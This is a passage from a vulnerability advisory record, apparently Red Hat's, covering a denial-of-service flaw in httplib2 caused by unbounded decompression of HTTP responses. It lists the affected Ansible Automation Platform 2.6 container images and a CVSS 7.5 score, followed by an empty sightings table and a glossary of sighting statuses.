"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "httplib2: httplib2: Denial of Service via unbounded decompression of HTTP response bodies"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.